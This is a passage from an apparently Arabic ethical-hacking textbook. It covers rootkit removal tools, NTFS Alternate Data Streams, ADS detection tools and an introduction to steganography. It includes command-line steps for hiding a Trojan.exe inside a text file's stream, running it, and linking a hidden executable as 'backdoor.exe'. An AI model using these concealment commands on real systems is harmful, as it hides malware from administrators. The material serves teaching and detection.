‫ﺑك ﻟﻠﺣﻣﺎﯾﺔ ﻣن اﻟروت ﻛت‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﺗطﺑﯾﻘﺎت ﻣﻛﺎﻓﺣﺔ اﻟروت ﻛت ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Virus Removal Tool available at http://www.sophos.com‬‬
‫‪Hypersight Rootkit Detector available at http://northsecuritylabs.blogspot.com/‬‬
‫‪Avira Free Antivirus Tool available at http://www.avira.com‬‬
‫‪SanityCheck available at http://www.resplendence.com‬‬
‫‪GMER available at http://www.gmer.net‬‬
‫‪Rootkit Buster available at http://downloadcenter.trendmicro.com‬‬
‫‪Rootkit Razor available at http://www.tizersecure.com‬‬
‫‪RemoveAny available at http://www.free-anti-spy.com‬‬
‫‪TDSSKiller available at http://support.kaspersky.com‬‬
‫‪Prevx available at http://www.prevx.com‬‬

‫‪NTFS Data Stream‬‬

‫ﺑﺎﻹﺿﺎﻓﺔ إﻟﻰ ﺳﻣﺎت اﻟﻣﻠف)‪ ، (File attribute‬ﻛل ﻣﻠف ﻣﺧزﻧﺔ ﻋﻠﻰ وﺣدة ﺗﺧزﯾن ‪ NTFS‬ﯾﺣﺗوي ﻋﺎدة ﻋﻠﻰ اﺛﻧﯾن ﻣن ﺗدﻓﻘﺎت اﻟﺑﯾﺎﻧﺎت‬
‫اﻷﺳﺎﺳﯾﺔ )‪ .(Data Stream‬دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻷوﻟﻰ ﯾﻘوم ﺑﺗﺧزﯾن واﺻﻔﺎت اﻷﻣﺎن)‪ ، (security descriptor‬ودﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺛﺎﻧﻲ ﯾﻘوم‬
‫ﺑﺗﺧزﯾن اﻟﺑﯾﺎﻧﺎت داﺧل اﻟﻣﻠﻔﺎت‪ .‬دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )]‪ (Alternate Data Stream [ADS‬ھﻲ ﻧوع آﺧر ﻣن دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﻣذﻛورة‬
‫واﻟﺗﻲ ﯾﻣﻛن أن ﺗﻛون ﻣوﺟودة ﻓﻲ ﻛل ﻣﻠف‪.‬‬
‫ﯾدﻋم ﻧظﺎم اﻟﻣﻠﻔﺎت ‪ NTFS‬ﻣﺎ ﯾﺳﻣﻰ ﺑـ ‪ Alternate Data Stream‬أو ‪.ADS‬‬
‫إﻧﺷﺎء اﻟـ ‪ ADS‬ﺟﺎء ﻟﯾﺣل ﻣﺷﻛﻠﺔ ﺣﺎﺟﺔ ﺑﻌض اﻟﺑراﻣﺞ إﻟﻰ رﺑط ﻣﻌﻠوﻣﺎت ﻣﻊ ﻣﻠف ﻣﻌﯾن ﺑﺣﯾث ﯾﺗم ھذا اﻟرﺑط ﺑﺷﻛل ‪ Transparent‬ﺑﺎﻟﻧﺳﺑﺔ‬
‫ﻟﻣﺳﺗﺧدﻣﻲ اﻟﻣﻠف )ﺑراﻣﺞ أو ﻣﺳﺗﺧدﻣﯾن‪ (.‬وأﯾﺿﺎ ﻻ ﯾﻐﯾّر ھذا اﻟرﺑط ﻣن ﺣﺟم اﻟﻣﻠف‪.‬‬
‫ﯾﺗم اﺳﺗﺧداﻣﮭﺎ أﯾﺿﺎ ﻟﺗواﻓﻖ اﻟوﯾﻧدوز ﻣﻊ ﻧظﺎم اﻟﻣﻠﻔﺎت اﻟﻘدﯾم ‪ HFS‬اﻟﺧﺎص ﺑﻣﺎﻛﻧﺗوش ﺣﯾث ﯾﺗم اﺳﺗﺧدام ﻣﻔﮭوم ﻣﻣﺎﺛل ﻓﻲ اﻟﻣﺎﻛﻧﺗوش ﺣﯾث‬
‫ﯾﺳﻣﻰ ھﻧﺎ ‪ Resource Forks‬وﺗﺳﺗﺧدم ﻓﻲ ﻣﺎﻛﻧﺗوش ﻟﺗﺧزﯾن أﯾﻘوﻧﺔ اﻟﻣﻠف ﻣﺛﻼ وﺷﻛل اﻟﻧﺎﻓذة‪ ،‬وأﯾﺿﺎ ﻟرﺑط اﻟﻣﻠف ﻣﻊ ﺑرﻧﺎﻣﺞ ﻣﻌﯾن )ﻓﻲ‬
‫وﯾﻧدوز ﯾﺗم ھذا اﻟرﺑط ﻣن ﺧﻼل ﻻﺣﻘﺔ اﻟﻣﻠف(‪.‬‬
‫ﻛﻣﺎ ﻗﻠﻧﺎ ﺳﺎﺑﻘﺎ ان أي اﻟﻣﻠف ﻓﻲ ﻧظﺎم ‪ NTFS‬ﻣؤﻟف ﻣن اﺛﻧﯾن ﻣن ‪ Stream‬اﻷﺳﺎﺳﯾﯾن وﻟﻛن ﯾوﺟد ﺗدﻓﻘﺎت أﺧرى )‪ .(stream‬وﻟﻛل‬
‫‪ Stream‬ﻣﺟﻣوﻋﺔ ﻣن اﻟﺧﺻﺎﺋص ﻟﺗوﺻﯾف ھذه اﻟـ ‪ .Stream‬ﻛﻣﺎ ﻓﻲ اﻟﺷﻛل اﻟﺗﺎﻟﻲ‪:‬‬
‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬
‫‪449‬‬

‫ﻟﻠـ ‪ Stream‬ﯾوﺟد اﺳم ﻣﻣﯾز ﻟﮫ‪ .‬واﻟـ ‪ Stream‬اﻻﻓﺗراﺿﯾﺔ ﺗﻛون ﺑدون اﺳم )‪ null‬ﻛﻣﺎ ﻓﻲ اﻟﺷﻛل اﻟﺳﺎﺑﻘﺔ(‪.‬‬
‫ﻻﺳﺗﺧدام ‪ Stream‬أﺧرى ﯾﺗم إﻟﺣﺎق اﺳم اﻟـ ‪ Stream‬ﺑﻌد اﺳم اﻟﻣﻠف وﺑﻌد ﻧﻘطﺗﯾن”‪. “:‬‬
‫ﻣﺛﺎل‪:‬‬
‫‪D:\test.txt‬‬ ‫‪=> Default Stream here‬‬
‫‪D:\test.txt:OPS => Stream called OPS‬‬
‫ﻣﺳﺗﻌرض اﻟوﯾﻧدوز ‪ Explorer‬ﻻ ﯾﻌرض اﻟـ ‪ Streams‬ﻟﻣﻠف ﻣﺎ‪ ،‬وﺑﺎﻟﺗﺎﻟﻲ ﯾﻣﻛن اﺧﻔﺎء ﻣﻌﻠوﻣﺔ ﻣﺎ ﺿﻣن ﻣﻠف ﻣﺎ ﺑﺣﯾث ﻻ ﯾﻣﻛن أن ﯾظﮭره‬
‫ﻣﺳﺗﻌرض وﯾﻧدوز‪.‬‬
‫ﻣﺛﺎل‪:‬‬
‫‪D:\> echo mypasword > passwords.txt:email‬‬
‫طﺑﻌﺎ إذا ﺗم ﻓﺗﺢ اﻟﻣﻠف ‪ passwords.txt‬ﺑﺷﻛل ﻋﺎدي ﻓﺳوف ﯾﺗم اﺳﺗﺧدام اﻟـ ‪ Stream‬اﻻﻓﺗراﺿﯾﺔ وﻟن ﯾﺗم إظﮭﺎر ﻣﺎ ﺗم إﺧﻔﺎءه ﺿﻣن اﻟـ‬
‫‪stream‬اﻟﺗﻲ أﻧﺷﺄﻧﺎھﺎ ھﻧﺎ‪. email‬‬
‫ﻹظﮭﺎر اﻟﻣﺣﺗوى )ﻣﺛﻼ(‪:‬‬
‫‪D:\> more < passwords.txt:email‬‬
‫‪mypasword‬‬
‫دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )]‪ (Alternate Data Stream [ADS‬ھو أي ﻧوع ﻣن اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﻣﻛن ﺗرﻛﯾﺑﮭﺎ ﻋﻠﻰ اﻟﻣﻠف وﻟﻛن ﻟﯾﺳت ﻓﻲ‪/‬داﺧل‬
‫اﻟﻣﻠف ﻋﻠﻰ ﻧظﺎم ‪ .NTFS‬ﺟدول اﻟﻣﻠﻔﺎت اﻟرﺋﯾﺳﯾﺔ )‪ (Master File Table‬اﻟﺧﺎص ﺑﻛل ﺑﺎرﺗﺷن ﯾﺣﺗوي ﻋﻠﻰ ﻗﺎﺋﻣﺔ ﺑﺟﻣﯾﻊ ﺗدﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ‬
‫ﯾﺣﺗوﯾﮭﺎ اﻟﻣﻠف‪ ،‬وﻣوﻗﻌﮭﺎ اﻟﻔﻌﻠﻲ ﻋﻠﻰ اﻟﻘرص اﻟﺻﻠب‪ .‬ﻟذﻟك‪ ،‬دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )‪ (ADS‬ﻟﯾﺳت ﻣوﺟودة ﻓﻲ اﻟﻣﻠف‪ ،‬وﻟﻛن ﻣﺗﺻﻠﺔ ﺑﮫ وذﻟك‬
‫ﻣن ﺧﻼل ﺟدول اﻟﻣﻠف‪ .‬دﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾﻠﺔ )]‪ (Alternate Data Stream [ADS‬ھو ﺟزء ﻣﺧﻔﻰ ﻓﻲ اﻟوﯾﻧدوز واﻟذي ﯾﺣﺗوي ﻋﻠﻰ‬
‫اﻟﺑﯾﺎﻧﺎت اﻟوﺻﻔﯾﺔ ﻟﻠﻣﻠف ﻣﺛل اﻟﺻﻔﺎت)‪ ،(Attribute‬ﻋدد اﻟﻛﻠﻣﺎت‪ ،‬اﺳم اﻟﻣؤﻟف‪ ،‬وﺑﯾﺎﻧﺎت اﻟوﺻول ووﻗت اﻟﺗﻌدﯾل ﻣن اﻟﻣﻠﻔﺎت‪.‬‬
‫ﯾﻣﻛن ﻣﺛﻼ اﻻﺳﺗﻔﺎدة ﻣن ‪ ADS‬ﻟﺗﺗﺑﻊ ﺣﺎﻟﺔ اﻟﻣﻠف ﻣﺛﻼ ﺣﺟﻣﮫ )ﻛﻣﺎ ﻓﻲ ﺑﻌض طرق اﻟﺣﻣﺎﯾﺔ‪ ،‬ﺣﯾث إذا ﺗﻐﯾّر ﺣﺟم ﻣﻠف ﺗﻧﻔﯾذي ﯾﻣﻛن اﻋﺗﺑﺎره ﻗد‬
‫أﺻﯾب ﺑﻔﯾروس( وﺑﺎﻟﺗﺎﻟﻲ ﺑدﻻ ﻣن إﻧﺷﺎء ﻗﺎﻋدة ﻣﻌﯾطﺎت ﺿﺧﻣﺔ ﻟﻛل ﻣﻠف ﻣوﺟود ﻋﻠﻰ اﻟﺟﮭﺎز ﯾﻣﻛن وﺿﻊ ھذه اﻟﻣﻌﻠوﻣﺎت ﻋﻧد ﻛل ﻣﻠف‪.‬‬
‫‪ ADS‬ﻟﮫ اﻟﻣﻘدرة ﻋﻠﻰ ﺗﻔرﯾﻖ اﻟﺑﯾﺎﻧﺎت إﻟﻰ اﻟﻣﻠﻔﺎت اﻟﻣوﺟودة دون ﺗﻐﯾﯾر أو ﺗﻐﯾﯾر وظﺎﺋﻔﮭﺎ‪ ،‬وﺣﺟﻣﮭﺎ‪ ،‬أو ﻋرﺿﮭﺎ ﻷداة ﻣﺗﺻﻔﺢ اﻟﻣﻠﻔﺎت‪.‬‬
‫‪ ADSs‬ﯾﻘدم ﻟﻠﻣﮭﺎﺟﻣﯾن طرﯾﻘﺔ ﯾﺧﺑﺊ ﺑﮭﺎ ‪ rootkits‬أو أدوات اﻟﻘراﺻﻧﺔ ﻋﻠﻰ اﻟﻧظﺎم اﻟﻣﺧﺗرق واﻟﺳﻣﺎح ﻟﮭم ﻟﯾﺗم ﺗﻧﻔﯾذھﺎ دون أن ﯾﺗم اﻛﺗﺷﺎﻓﮭﺎ‬
‫ﻣن ﻗﺑل ﻣﺳؤول اﻟﻧظﺎم‪ .‬اﻟﻣﻠﻔﺎت ﻣﻊ ‪ ADS‬ﻣن اﻟﻣﺳﺗﺣﯾل أن ﯾﺗم اﻟﻛﺷف ﻋﻧﮭﺎ ﺑﺎﺳﺗﺧدام ﺗﻘﻧﯾﺎت ﺗﺻﻔﺢ اﻟﻣﻠف اﻷﺻﻠﻲ ﻣﺛل ﺳطر اﻷواﻣر‬
‫)‪ (Command Line‬أو ﻣﺗﺻﻔﺢ ﻣﻠﻔﺎت اﻟوﯾﻧدوز )‪ .(Windows Explorer‬ﺑﻌد إرﻓﺎق‪/‬رﺑط ﻣﻠف ‪ ADS‬إﻟﻰ اﻟﻣﻠف اﻷﺻﻠﻲ‪ ،‬ﻓﺎن ﺣﺟم‬
‫اﻟﻣﻠف ﺳوف ﯾظﮭر اﻟﺣﺟم اﻷﺻﻠﻲ ﻟﻠﻣﻠف ﻓﻘط ﺑﻐض اﻟﻧظر ﻋن ﺣﺟم ‪ .ADS anyfile.exe‬اﻟﻣؤﺷر اﻟوﺣﯾد اﻟذي ﺗﻌﺑر اﻧﮫ ﺗم ﺗﻐﯾﯾر اﻟﻣﻠف ھو‬
‫ﺗﻌدﯾل اﻟطﺎﺑﻊ اﻟزﻣﻧﻲ)‪ ،(TimeStamp‬اﻟﺗﻲ ﯾﻣﻛن أن ﺗﻛون ﻏﯾر ﺿﺎرة ﻧﺳﺑﯾﺎ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


450

‫؟‬NTFS Stream ‫ﻛﯾﻔﯾﺔ اﻧﺷﺎء‬


:‫ وذﻟك ﻣن ﺧﻼل اﺗﺑﺎع اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‬NTFS Stream ‫ﯾﻣﻛن اﻧﺷﺎء‬
c:\>notepad myfile.txt:1ion.txt
.‫ أﺳطر ﻣن اﻟﺑﯾﺎﻧﺎت‬10 ‫(ﻹﻧﺷﺎء ﻣﻠف ﺟدﯾد وﻧﻛﺗب ﻓﯾﮫ‬Yes) ‫اﻧﻘر ﻓوق ﻧﻌم‬
.‫ﺛم ﻧﻘوم ﺑﺣﻔظ اﻟﻣﻠﻔﺎت‬
c:\>notepad myfile.txt:tiger.txt
.‫ ﺳطر ﻣن اﻟﺑﯾﺎﻧﺎت اﻻﺧرى‬20 ‫(ﻹﻧﺷﺎء ﻣﻠف ﺟدﯾد وﻧﻛﺗب ﻓﯾﮫ‬Yes) ‫اﻧﻘر ﻓوق ﻧﻌم‬
.‫ﺛم ﻧﻘوم ﺑﺣﻔظ اﻟﻣﻠﻔﺎت‬
.‫ ﺳوف ﺗﺟد اﻧﮫ ﺻﻔر‬myfile.txt ‫اذھب ﻟرؤﯾﺔ ﺣﺟم اﻟﻣﻠف‬
.Notepad ‫[ ﻓﻲ‬myfi1e.txt:tiger.txt] ‫ ﯾﻣﻛﻧك ذﻟك ﻣن ﺧﻼل ﻓﺗﺢ اﻟﻣﻠف‬Stream ‫ﻟﻠﺗﻌدﯾل ﻋﻠﻰ ﺑﯾﺎﻧﺎت‬

NTFS Stream Manipulation (Hiding Trojan in NTFS Stream)

:‫ ﻋن طرﯾﻖ ﺗﻧﻔﯾذ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‬NTFS Stream ‫ﯾﻣﻛﻧك ﻣﻌﺎﻟﺟﺔ‬

:(Stream) README.TXT ‫ إﻟﻰ‬Trojan.exe ‫ ﻟﻧﻘل ﻣﺣﺗوﯾﺎت‬-


c:\>type c:\Trojan.exe > c:\Readme.txt:Trojan.exe
:(Stream) README.TXT ‫ ﺑداﺧل‬Trojan.exe ‫ ﻟﺗﺷﻐﯾل اﻟﻣﻠف‬-
c:\>start c:\Readme.txt:Trojan.exe
:(Stream) README.TXT ‫ ﻣن‬Trojan.exe ‫ ﻻﺳﺗﺧراج ﻣﺣﺗوﯾﺎت‬-
c:\>cat c:\Readme.txt:Trojan.exe > Trojan.exe
. [Cat is a Windows 2003 Resource Kit Utility]:‫ﻣﻠﺣوظﮫ‬

https://www.facebook.com/tibea2004 ‫ ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬.‫د‬


‫‪451‬‬

‫‪Hiding Files Using NTFS Streams‬‬

‫ﻧﻔرض اﻧﻧﺎ ﻧرﯾد إﺧﻔﺎء ﻣﻠف ﻣﺎ ﺑواﺳطﺔ ‪ NTFS Stream‬وﻟﯾﻛن ﻣﺛﻼ ‪ calc.exe‬ﻧﺗﺑﻊ اﻟﺧطوات اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ -1‬ﻧﻘوم ﺑﺈﻧﺷﺎء ﻣﺟﻠد ﯾﺳﻣﻰ ‪ magic‬ﻓﻲ اﻟﺑﺎرﺗﺷن \‪ C:‬ﺛم ﻧﻘوم ﺑﻧﺳﺦ اﻟﻣﻠف ‪ calc.exe‬اﻟﻣوﺟود ﻓﻲ اﻟﻣﺳﺎر ‪C:\windows\system32‬‬
‫اﻟﻰ اﻟﻣﺟﻠد ‪.C:\magic‬‬
‫‪ -2‬ﻧﻘوم ﺑﻔﺗﺢ ﺳطر اﻷواﻣر ‪ Command Prompt‬وﻣن ﺧﻼﻟﮫ ﻧﻘوم ﺑﺎﻟذھﺎب اﻟﻰ اﻟﻣﺟﻠد ‪ ،C:\magic‬ﺛم ﺑﻌد ذﻟك ﻧﻘوم ﺑطﺑﺎﻋﺔ‬
‫اﻟﺳطر ‪ notepad readme.txt‬ﻓﻲ ﺳطر اﻷواﻣر ﺛم اﻟﻧﻘر ﻓوق ‪.Enter‬‬
‫‪ -3‬ھذا ﯾؤدى اﻟﻰ ظﮭور ﺑرﻧﺎﻣﺞ اﻟﻛﺗﺎﺑﺔ ‪ notepad‬ﻧﻘوم ﺑﻛﺗﺎﺑﺔ اﻟﺳطر ‪ Hello world‬ﻓﯾﮫ ﺛم ﻏﻠﻖ وﺣﻔظ اﻟﻣﻠف‪.‬‬

‫‪ -4‬ﻧﻘوم ﺑﻣﻼﺣظﮫ ﺣﺟم اﻟﻣﻠف ‪ readme.txt‬ﻣن ﺧﻼل طﺑﺎﻋﺔ اﻟﺳطر ‪ dir‬ﻓﻲ ﺳطر اﻷواﻣر ‪.Command Prompt‬‬
‫‪ -5‬ﻧذھب اﻻن اﻟﻰ إﺧﻔﺎء اﻟﻣﻠف ‪ calc.exe‬ﻓﻲ اﻟﻣﻠف ‪ readme.txt‬وذﻟك ﻣن ﺧﻼل طﺑﺎﻋﺔ اﻟﺳطر اﻟﺗﺎﻟﻲ ﻓﻲ ﺳطر اﻷواﻣر ‪.cmd‬‬
‫‪C:\type c:\magic\calc.exe > c:\magic\readme.txt:calc.exe‬‬

‫‪ -6‬ﺑﻌد اﺳﺗﺧدام ھذا اﻟﺳطر وﻣﻼﺣظﮫ اﻟﻣﺳﺎﺣﺔ اﻟﺟدﯾدة ﻟﻠﻣﻠف ‪ readme.txt‬ﻧﺟد اﻧﮭﺎ ﻟم ﺗﺗﻐﯾر‪.‬‬
‫‪ -7‬اﻻن ﯾﻣﻛﻧك ﺣذف اﻟﻣﻠف ‪ calc.exe‬ﻷﻧﻧﺎ ﻟم ﻧﻌد ﻓﻲ ﺣﺎﺟﮫ اﻟﯾﮫ ﺣﯾث ﻗﻣﻧﺎ ﻣن ﺧﻼل اﻟﺳطر اﻟﺳﺎﺑﻖ ﺑﺈﺧﻔﺎﺋﮫ ﻓﻲ اﻟﻣﻠف ‪.readme.txt‬‬
‫‪ -8‬اﻻن ﻧﻘوم ﺑطﺑﺎﻋﺔ اﻟﺳطر اﻟﺗﺎﻟﻲ وذﻟك ﻟﻌﻣل رﺑط ﻟﻠﻣﻠف ‪ calc.exe‬اﻟﻣﺧﺑﺄ ﻓﻲ اﻟﻣﻠف ‪.readme.txt‬‬
‫‪C:\ mklink backdoor.exe readme.txt:calc.exe‬‬
‫‪ -9‬ﺛم اﻟﻧﻘر ﻓوق ‪.Enter‬‬
‫‪ -10‬ﻋﻧد طﺑﺎﻋﺔ ‪ backdoor‬ﻓﻲ ﺳطر اﻷواﻣر ﻓﮭذا ﺳوف ﯾؤدى اﻟﻰ ﺗﺷﻐﯾل اﻻﻟﮫ اﻟﺣﺎﺳﺑﺔ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪452‬‬

‫‪Ntfs Stream Detector: StreamArmor‬‬


‫اﻟﻣﺻدر‪http://securityxploded.com :‬‬
‫ھذه اﻷداة ﺗﺳﺎﻋدك ﻋﻠﻰ اﻟﻛﺷف ﻋﻠﻰ ﺗدﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﺑدﯾل )‪ (ADS‬اﻟﻣﺧﺑﺄ وإزاﻟﺗﮫ ﻣن اﻟﻧظﺎم اﻟﺧﺎص ﺑك ﺗﻣﺎﻣﺎ‪ .‬وھو‬
‫‪ Multithreaded ADS scanner‬ﺑﺣﯾث ﯾﺳﺎﻋدك ﻋﻠﻰ اﻟﻔﺣص اﻟﻣﺗﻛرر ﻋﻠﻰ اﻟﻧظﺎم ﺑﺄﻛﻣﻠﮫ واﻟﻛﺷف ﻋن ﻛل ‪ Streams‬اﻟﻣﺧﺑﺄة ﻓﻲ‬
‫اﻟﻧظﺎم اﻟﺧﺎص ﺑك‪ .‬ﯾﻣﻛﻧك ﺑﺳﮭوﻟﺔ اﻛﺗﺷﺎف ﺗدﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﻣﺷﺑوھﺔ ﻣن ﺗدﻓﻖ اﻟﺑﯾﺎﻧﺎت اﻟﻌﺎدﯾﺔ ﻛﻣﺎ ﯾﻌرض ‪ Stream‬ﻣﻌﯾن اﻛﺗﺷف ﻣﻊ ﻧﻣط‬
‫ﻟون ﻣﺣدد‪ .‬ﻛﻣﺎ أﻧﮫ ﻗﺎدر ﻋﻠﻰ اﻟﻛﺷف ﻋن ﻧوع ‪ Streams‬ﻟﻠﻣﻠف ﺑﺎﺳﺗﺧدام أﻟﯾﺔ‪.Advance File type detection mechanism‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪453‬‬

‫‪NTFS Stream Detector: Other Tools‬‬


‫ھﻧﺎك اﻟﻌدﯾد ﻣن أدوات اﻟﻛﺷف ﻋن ‪ NTFS Stream‬اﻟﻣﺗﺎﺣﺔ ﻓﻲ اﻟﺳوق‪ .‬ﯾﻣﻛﻧك اﻟﻛﺷف ﻋن اﻟﺗدﻓﻘﺎت اﻟﻣﺷﺑوھﺔ ﻣﻊ أدوات اﻟﻛﺷف ﻋن‬
‫‪ NTFS Stream‬اﻟﺗﺎﻟﯾﺔ‪:‬‬

‫‪ADS Spy available at http://www.merijn.nu‬‬


‫‪ADS Manager available at http://dmitrybrant.com‬‬
‫‪Streams available at http://technet.microsoft.com‬‬
‫‪Alternatestreamview available at http://www.nirsoft.net‬‬
‫‪NTFS-Streams: ADS manipulation tool available at http://sourceforge.net‬‬
‫‪Stream Explorer available at http://www.rekenwonder.com‬‬
‫‪ADS Scanner available at http://www.pointstone.com‬‬
‫‪RKDetector available at http://www.rkdetector.com‬‬
‫‪GMER available at http://www.gmer.net‬‬
‫‪Hijack This available at http://free.antivirus.com‬‬

‫‪STEGANOGRAPHY‬‬

‫ﻛﺛﯾرة ھﻲ اﻟطرق أو اﻟوﺳﺎﺋل اﻟﺗﻲ ﯾﺳﺗﻐﻠﮭﺎ ﺑﻌض ﻣن ﺗﺳول ﻟﮫ ﻧﻔﺳﮫ اﻟﻌﺑث ﺑﻣﻣﺗﻠﻛﺎت اﻟﻐﯾر‪ ،‬ﺳواء ﻛﺎﻧت أﺷﯾﺎء ﻣﻠﻣوﺳﺔ أو ﻣﻌﻠوﻣﺎت ﻣﺧزﻧﺔ ﻓﻲ‬
‫اﻷﺟﮭزة اﻟﺣﺎﺳوﺑﯾﺔ‪ .‬وﻓﻲ اﻟﻌﺻر اﻟﺣدﯾث أو ﻣﺎ ﯾﺳﻣﻰ ﺑﻌﺻر اﻟﻣﻌﻠوﻣﺎﺗﯾﺔ‪ ،‬ﺗﻧﺎﻣت ﻗﯾﻣﺔ اﻟﻣﻌﻠوﻣﺎت ﻟدرﺟﺔ ﺗﻔوق ﺑﻣراﺣل اﻟﻣﻣﺗﻠﻛﺎت اﻟﺣﺳﯾﺔ‪،‬‬
‫وھذا ﻣﺎ أﺛرى اﻟﺑﺣث ﻓﻲ ﻣﺟﺎل اﻟوﺳﺎﺋل اﻟﺗﻲ ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻋﻣن ﻻ ﯾﻣﺗﻠﻛﮭﺎ ووﺿﻌﮭﺎ ﻓﻲ ﻣﺄﻣن‪ ،‬وﻛذﻟك اﻟوﺳﺎﺋل اﻟﺗﻲ‬
‫ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ ﻛﺷف أي ﻣﻌﻠوﻣﺎت ﻣﺧﺑﺄة ﺑطرﯾﻘﺔ ﻏﯾر ﺷرﻋﯾﺔ‪ .‬وﻋﻧد اﻟﺣدﯾث ﻋن إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت‪ ،‬ﻓﺈن أول ﻣﺎ ﯾﺗﺑﺎدر إﻟﻰ اﻟذھن ھو ﻋﻣﻠﯾﺔ‬
‫ﺗﺷﻔﯾر اﻟﻣﻌﻠوﻣﺎت)‪ (Cryptography‬أو ﺗﺣوﯾﻠﮭﺎ إﻟﻰ ﺻﯾﻐﺔ أﺧرى ﻏﯾر ﻣﻔﮭوﻣﺔ إﻻ ﺑﺎﺳﺗﺧدام ﻣﻔﺗﺎح اﻟﺷﻔرة أو ال)‪ .(key‬ﻟﻛن ھذا ﻻ ﯾﻌﻧﻲ‬
‫أن اﻟﺗﺷﻔﯾر ھو اﻟطرﯾﻘﺔ اﻟوﺣﯾدة اﻟﺗﻲ ﯾﻣﻛن ﻣن ﺧﻼﻟﮭﺎ إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ﻋن اﻟﻐﯾر‪ .‬ﻓﻲ اﻟواﻗﻊ‪ ،‬ھﻧﺎك ﻓن آﺧر ﯾﻘﺿﻰ ﺑﺈﺧﻔﺎء اﻟﺑﯾﺎﻧﺎت ﻛﻠﯾﺎ‬
‫ﻟﻠﺗواﺻل ﻣﺎ ﺑﯾن ﺟﮭﺗﯾن ﻟﺗﺻﺑﺢ ھذه اﻟﺑﯾﺎﻧﺎت أو ھذا اﻻﺗﺻﺎل ﻏﯾر ظﺎھر ﻣن اﻷﺳﺎس ﻟﺟﮭﺔ ﺛﺎﻟﺛﺔ وھذا ﻣﺎ ﯾﻌرف ب‪.Steganography‬‬
‫واﻟﺗﻲ ﻛﺛﯾرا ﻣﺎ ﺗﺳﺗﺧدم ﻣن ﻗﺑل ﻟﺻوص اﻟﻣﻌﻠوﻣﺎت ﻟﺳرﻗﺔ ﻣﻌﻠوﻣﺎت ﺣﺳﺎﺳﺔ‪ .‬إذن‪ ،‬ﻓﻣﺎ ھﻲ اﻟﺳﺗﯾﻐﺎﻧوﻏراﻓﻲ‪ ،‬وﻛﯾف ﺗﺳﺗﺧدم‪ ،‬وھل ﯾﻣﻛن‬
‫اﻛﺗﺷﺎﻓﮭﺎ واﻟﺗﺣﻔظ ﻣﻧﮭﺎ؟ ﺳﺄﺣﺎول إﺟﺎﺑﺔ ھذه اﻷﺳﺋﻠﺔ ﺑطرﯾﻘﺔ ﻣﺑﺳطﺔ ﻓﻲ اﻟﺳطور اﻟﺗﺎﻟﯾﺔ‪.‬‬

‫ﻛﻠﻣﺔ ‪ Steganography‬أو إﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت ھﻲ اﻟطرﯾﻘﺔ أو اﻟﺗﻘﻧﯾﺔ ﻟﺣﺟب وإﺧﻔﺎء اﻟﻣﻌﻠوﻣﺎت داﺧل وﺳﯾط رﻗﻣﻲ ﺑﻐرض ﻧﻘﻠﮭﺎ ﻋﺑر ھذا‬
‫اﻟوﺳﯾط إﻟﻰ ﻣﻛﺎن آﺧر ﺣﯾث ﯾﺳﺗﻌﻣل ھذا اﻟوﺳط‪ ،‬وذﻟك ﺣﺗﻰ ﯾﺗم إﺧﻔﺎء أن ھﻧﺎك اﺗﺻﺎل أو ﺗﺑﺎدل ﻣﻌﻠوﻣﺎت‪ .‬ﯾﺗم ﻓﻲ اﻟﺧﻔﺎء‪ ،‬وﻻ ﯾﻛون ﻋﻠﻰ ﻋﻠم‬
‫ﺑﮭذا اﻻﺗﺻﺎل إﻻ اﻷﺷﺧﺎص اﻟﻣﻌﻧﯾﯾن‪.‬‬
‫ﻓﻌﻠﻰ ﺳﺑﯾل اﻟﻣﺛﺎل‪ ،‬ﻗد ﯾﺳﺗﺧدم ﺷﺧص ﻣﺎ ﺻورة إﻟﻛﺗروﻧﯾﺔ ﻟﻧﻘل رﺳﺎﺋل ﻧﺻﯾﺔ )أو ﺣﺗﻰ ﺻور ﻣﺧﻔﯾﺔ( إﻟﻰ ﺷﺧص آﺧر دون أن ﯾﻌﻠم أﺣد‪ .‬ﻓﻛل‬
‫ﻣن ﯾﻧظر ﻣن اﻟﺧﺎرج ﯾظن أن اﻟﺷﺧﺻﯾن ﯾﺗﺑﺎدﻻن ﺻورا‪ ،‬ﺑﯾﻧﻣﺎ ھذه اﻟﺻور ﻣﺣﻣﻠﺔ ﺑرﺳﺎﺋل ﻣﺧﻔﯾﺔ ﻏﯾر واﺿﺣﺔ ﻟﻠﻌﯾﺎن‪.‬‬
